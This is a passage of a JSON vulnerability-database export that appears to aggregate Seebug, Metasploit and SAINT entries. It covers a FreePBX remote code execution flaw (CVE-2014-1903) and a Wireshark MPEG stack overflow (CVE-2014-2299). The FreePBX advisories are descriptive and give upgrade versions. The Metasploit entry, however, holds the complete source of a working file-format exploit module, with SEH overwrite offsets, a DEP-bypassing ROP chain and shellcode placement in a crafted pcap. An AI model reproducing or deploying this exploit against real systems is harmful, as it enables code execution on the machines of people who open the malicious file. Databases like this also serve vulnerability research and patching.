2.9\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u6f0f\u6d1e\uff0c\u8bf7\u4e0b\u8f7d\u4f7f\u7528\uff1a\r\nhttp://www.freepbx.org/news/2014-02-06/security-vulnerability-notice", "modified": "2014-04-01T00:00:00", "published": "2014-04-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-62027", "id": "SSV:62027", "title": "FreePBX Framework\u6a21\u5757admin/libraries/view.functions.php\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e", "type": "seebug", "sourceData": "", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": ""}], "metasploit": [{"lastseen": "2019-06-23T00:39:41", "bulletinFamily": "exploit", "description": "This module triggers a stack buffer overflow in Wireshark <= 1.8.12/1.10.5 by generating a malicious file.\n", "modified": "2017-09-14T02:03:34", "published": "2014-04-24T18:17:08", "id": "MSF:EXPLOIT/WINDOWS/FILEFORMAT/WIRESHARK_MPEG_OVERFLOW", "href": "", "type": "metasploit", "title": "Wireshark wiretap/mpeg.c Stack Buffer Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::FILEFORMAT\n include Msf::Exploit::Remote::Seh\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Wireshark wiretap/mpeg.c Stack Buffer Overflow',\n 'Description' => %q{\n This module triggers a stack buffer overflow in Wireshark <= 1.8.12/1.10.5\n by generating a malicious file.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Wesley Neelen', # Discovery vulnerability\n 'j0sm1', # Exploit and msf module\n ],\n 'References' =>\n [\n [ 'CVE', '2014-2299'],\n [ 'URL', 'https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=9843' ],\n [ 'URL', 'http://www.wireshark.org/security/wnpa-sec-2014-04.html' ],\n [ 'BID', '66066']\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Payload' =>\n {\n 'BadChars' => \"\\xff\",\n 'Space' => 600,\n 'DisableNops' => 'True',\n 'PrependEncoder' => \"\\x81\\xec\\xc8\\x00\\x00\\x00\" # sub esp,200\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'WinXP SP3 Spanish (bypass DEP)',\n {\n 'OffSet' => 69732,\n 'OffSet2' => 70476,\n 'Ret' => 0x1c077cc3, # pop/pop/ret -> \"c:\\Program Files\\Wireshark\\krb5_32.dll\" (version: 1.6.3.16)\n 'jmpesp' => 0x68e2bfb9,\n }\n ],\n [ 'WinXP SP2/SP3 English (bypass DEP)',\n {\n 'OffSet2' => 70692,\n 'OffSet' => 70476,\n 'Ret' => 0x1c077cc3, # pop/pop/ret -> krb5_32.dll module\n 'jmpesp' => 0x68e2bfb9,\n }\n ],\n ],\n 'Privileged' => false,\n 'DisclosureDate' => 'Mar 20 2014'\n ))\n\n register_options(\n [\n OptString.new('FILENAME', [ true, 'pcap file', 'mpeg_overflow.pcap']),\n ])\n end\n\n def create_rop_chain()\n\n # rop chain generated with mona.py - www.corelan.be\n rop_gadgets =\n [\n 0x61863c2a, # POP EAX # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]\n 0x62d9027c, # ptr to &VirtualProtect() [IAT libcares-2.dll]\n 0x61970969, # MOV EAX,DWORD PTR DS:[EAX] # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]\n 0x61988cf6, # XCHG EAX,ESI # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]\n 0x619c0a2a, # POP EBP # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]\n 0x61841e98, # & push esp # ret [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]\n 0x6191d11a, # POP EBX # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]\n 0x00000201, # 0x00000201-> ebx\n 0x5a4c1414, # POP EDX # RETN [zlib1.dll, ver: 1.2.5.0]\n 0x00000040, # 0x00000040-> edx\n 0x6197660f, # POP ECX # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]\n 0x668242b9, # &Writable location [libgnutls-26.dll]\n 0x6199b8a5, # POP EDI # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0\n 0x63a528c2, # RETN (ROP NOP) [libgobject-2.0-0.dll]\n 0x61863c2a, # POP EAX # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]\n 0x90909090, # nop\n 0x6199652d, # PUSHAD # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]\n ].flatten.pack(\"V*\")\n\n return rop_gadgets\n\n end\n\n def exploit\n\n print_status(\"Creating '#{datastore['FILENAME']}' file ...\")\n\n ropchain = create_rop_chain\n magic_header = \"\\xff\\xfb\\x41\" # mpeg magic_number(MP3) -> http://en.wikipedia.org/wiki/MP3#File_structure\n # Here we build the packet data\n packet = rand_text_alpha(883)\n packet << \"\\x6c\\x7d\\x37\\x6c\" # NOP RETN\n packet << \"\\x6c\\x7d\\x37\\x6c\" # NOP RETN\n packet << ropchain\n packet << payload.encoded # Shellcode\n packet << rand_text_alpha(target['OffSet'] - 892 - ropchain.length - payload.encoded.length)\n\n # 0xff is a badchar for this exploit then we can't make a jump back with jmp $-2000\n # After nseh and seh we haven't space, then we have to jump to another location.\n\n # When file is open with command line. This is NSEH/SEH overwrite\n packet << make_nops(4) # nseh\n packet << \"\\x6c\\x2e\\xe0\\x68\" # ADD ESP,93C # MOV EAX,EBX # POP EBX # POP ESI # POP EDI # POP EBP # RETN\n\n packet << rand_text_alpha(target['OffSet2'] - target['OffSet'] - 8) # junk\n\n # When file is open with GUI interface. This is NSEH/SEH overwrite\n packet << make_nops(4) # nseh\n # seh -> # ADD ESP,86C # POP EBX # POP ESI # POP EDI # POP EBP # RETN ** [libjpeg-8.dll] **\n packet << \"\\x55\\x59\\x80\\x6b\"\n\n print_status(\"Preparing payload\")\n filecontent = magic_header\n filecontent << packet\n print_status(\"Writing payload to file, \" + filecontent.length.to_s()+\" bytes\")\n file_create(filecontent)\n\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/fileformat/wireshark_mpeg_overflow.rb"}], "saint": [{"lastseen": "2016-10-03T15:01:59", "bulletinFamily": "exploit", "description": "Added: 04/03/2014 \nCVE: [CVE-2014-1903](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1903>) \nBID: [65509](<http://www.securityfocus.com/bid/65509>) \nOSVDB: [103240](<http://www.osvdb.org/103240>) \n\n\n### Background\n\nFreePBX is an open source telephony front-end, which has an easy to use graphical user interface that controls and manages Asterisk. \n\n### Problem\n\nThe Framework module of FreePBX is vulnerable to remote code execution as a result of improper sanitization of user-supplied input. The vulnerability is triggered when input passed as arguments to the `**config.php**` script is not propery sanitized upon submission to the `**admin/libraries/view.functions.php**` script. FreePBX versions 2.9 before 2.9.0.14, 2.10 before 2.10.1.15, 2.11 before 2.11.0.23, and 12 before 12.0.1alpha22 are vulnerable. \n\n### Resolution\n\nUpgrade to version 2.9.0.14, 2.10.1.15, 2.11.0.23, 12.0.1alpha22, or higher. \n\n### References\n\n<http://www.freepbx.org/news/2014-02-06/security-vulnerability-notice> \n<http://issues.freepbx.org/browse/FREEPBX-7123> \n<http://downloads.securityfocus.com/vulnerabilities/exploits/65509.php> \n\n\n### Limitations\n\nThe `**telnet**` application must exist on the target system. \n\n### Platforms\n\nLinux \n \n\n", "modified": "2014-04-03T00:00:00", "published": "2014-04-03T00:00:00", "id": "SAINT:39552A768A14F561C49AE81E9E058E30", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/freepbx_config", "type": "saint", "title": "FreePBX Framework Module view.functions.php Remote Code Execution", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-06-04T23:19:38", "bulletinFamily": "exploit", "description": "Added: 04/03/2014 \nCVE: [CVE-2014-1903](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1903>) \nBID: [65509](<http://www.securityfocus.com/bid/65509>) \nOSVDB: [103240](<http://www.osvdb.org/103240>) \n\n\n### Background\n\nFreePBX is an open source telephony front-end, which has an easy to use graphical user interface that controls and manages Asterisk. \n\n### Problem\n\nThe Framework module of FreePBX is vulnerable to remote code execution as a result of improper sanitization of user-supplied input. The vulnerability is triggered when input passed as arguments to the `**config.php**` script is not propery sanitized upon submission to the `**admin/libraries/view.functions.php**` script. FreePBX versions 2.9 before 2.9.0.14, 2.10 before 2.10.1.15, 2.11 before 2.11.0.23, and 12 before 12.0.1alpha22 are vulnerable. \n\n### Resolution\n\nUpgrade to version 2.9.0.14, 2.10.1.15, 2.11.0.23, 12.0.1alpha22, or higher. \n\n### References\n\n<http://www.freepbx.org/news/2014-02-06/security-vulnerability-notice> \n<http://issues.freepbx.org/browse/FREEPBX-7123> \n<http://downloads.securityfocus.com/vulnerabilities/exploits/65509.php> \n\n\n### Limitations\n\nThe `**telnet**` application must exist on the target system. \n\n### Platforms\n\nLinux \n \n\n", "modified": "2014-04-03T00:00:00", "published": "2014-04-03T00:00:00", "id": "SAINT:8B25D0B9043F412FEBFAAC119CBD87D3", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/freepbx_config", "title": "FreePBX Framework Module view.functions.php Remote Code Execution", "type": "saint", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T19:19:30", "bulletinFamily": "exploit", "description": "Added: 04/03/2014 \nCVE: [CVE-2014-1903](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1903>) \nBID: [65509](<http://www.securityfocus.com/bid/65509>) \nOSVDB: [103240](<http://www.osvdb.org/103240>) \n\n\n### Background\n\nFreePBX is an open source telephony front-end, which has an easy to use graphical user interface that controls and manages Asterisk. \n\n### Problem\n\nThe Framework module of FreePBX is vulnerable to remote code execution as a result of improper sanitization of user-supplied input. The vulnerability is triggered when input passed as arguments to the `**config.php**` script is not propery sanitized upon submission to the `**admin/libraries/view.functions.php**` script. FreePBX versions 2.9 before 2.9.0.14, 2.10 before 2.10.1.15, 2.11 before 2.11.0.23, and 12 before 12.0.1alpha22 are vulnerable. \n\n### Resolution\n\nUpgrade to version 2.9.0.14, 2.10.1.15, 2.11.0.23, 12.0.1alpha22, or higher. \n\n### References\n\n<http://www.freepbx.org/news/2014-02-06/security-vulnerability-notice> \n<http://issues.freepbx.org/browse/FREEPBX-7123> \n<http://downloads.securityfocus.com/vulnerabilities/exploits/65509.php> \n\n\n### Limitations\n\nThe `**telnet**` application must exist on the target system. \n\n### Platforms\n\nLinux \n \n\n", "modified": "2014-04-03T00:00:00", "published": "2014-04-03T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/freepbx_config", "id": "SAINT:FA4FCDE96D7598CC10207A31600CE243", "type": "saint", "title": "FreePBX Framework Module view.functions.php Remote Code Execution", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}